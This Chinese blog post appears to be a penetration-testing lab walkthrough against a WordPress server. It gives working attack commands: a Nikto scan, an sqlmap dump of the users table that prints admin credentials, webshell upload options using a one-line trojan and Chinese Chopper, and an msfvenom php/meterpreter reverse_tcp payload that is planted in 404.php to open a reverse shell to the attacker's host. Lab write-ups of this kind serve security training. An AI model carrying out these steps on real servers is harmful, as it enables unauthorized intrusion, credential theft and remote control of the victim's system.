当前位置:首页 » 《随便一记》 » 正文

使用反弹木马进行提权_forget_mt的博客

12 人参与  2022年04月19日 12:51  分类 : 《随便一记》  评论

点击全文阅读


渗透机:kail  ip:172.16.5.6

靶   机:linux ip:172.16.5.7

客户端:windows XP ip: 172.16.5.128

通过Nikto对服务器80端口进行扫描:

nikto -host http://172.16.1.200 

发现了login.php文件与phpmyadmin/目录

所以直接在浏览器中访问login.php

sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -D wordpress8080 -T users --dump

 

从这里我们就知道了用户名admin与密码SuperSecretPassword登录后台

接下来利用WordPress进行提权操作,基本上提权的方式有三种:

1.将一句话写到一个文件夹下并压缩成.zip格式上传

2.找到能编辑的php文件,将一句话写进去,然后使用菜刀来连接该一句话木马

3.通过php shell反弹木马并结合Meterpreter实现反弹连接

这里我们尝试以读写的方式生成一个shell.php文件。 

然后使用windows里的中国菜刀来连接木马的地址

 

 利用msf生成一个php格式的反弹木马脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.100 LPORT=886 -f raw > shell.php

打开msfconsole控制台

先不着急运行模块,先将木马源码复制出来上传到靶机,替换掉服务器的404.php页面内容,再次访问http://172.16.5.7:8080/wordpress/404.php来触发php反弹木马。

运行模块,成功进入后渗透。

 

 


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/38436.html

木马  反弹  句话  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 全文发现祠堂的秘密后,全村无一活口+后续+番外(冯若琳杜伟)列表_全文发现祠堂的秘密后,全村无一活口+后续+番外
  • 此后经年,白首不相离限时免费***章节速览_「宋清婉王爷宋芷」小说章节试读
  • 「离婚后,我成了前妻高攀不起的神」小说后续在线免费阅读_黄星赵晓然后续全文免费阅读
  • 「余寿三年,公主她杀回宫了」爆款小说高能章节试读_[商无忧赵元婴]节选推荐
  • 奈何悲欢已成空结局+番外(邱意浓陆为舟)列表_奈何悲欢已成空结局+番外(邱意浓陆为舟)奈何悲欢已成空结局+番外在线
  • 不做你的乖乖女在线看(裴洵苏晓玥)_不做你的乖乖女在线看(裴洵苏晓玥)
  • 全书浏览奈何悲欢已成空(邱意浓陆为舟)_奈何悲欢已成空(邱意浓陆为舟)全书结局
  • 爱在绝路尽成灰小说免费在线阅读_[林梦云周盛老公]免费
  • 骄狂富少恋爱惨遭滑铁卢,他更疯了沈霜梨谢京鹤_骄狂富少恋爱惨遭滑铁卢,他更疯了沈霜梨谢京鹤
  • 你玩弄我感情在先,我转身娶你姐你哭什么章节悬念抢先解锁‌_「傅应川宋晚意」最新后续章节在线阅读
  • 山海藏爱意全书+后续+结局(沈肆林听)列表_山海藏爱意全书+后续+结局(沈肆林听)全书+后续+结局在线
  • 全文如果再见不能红着眼一口气读完(颜书意宋闻卿)列表_全文如果再见不能红着眼一口气读完

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1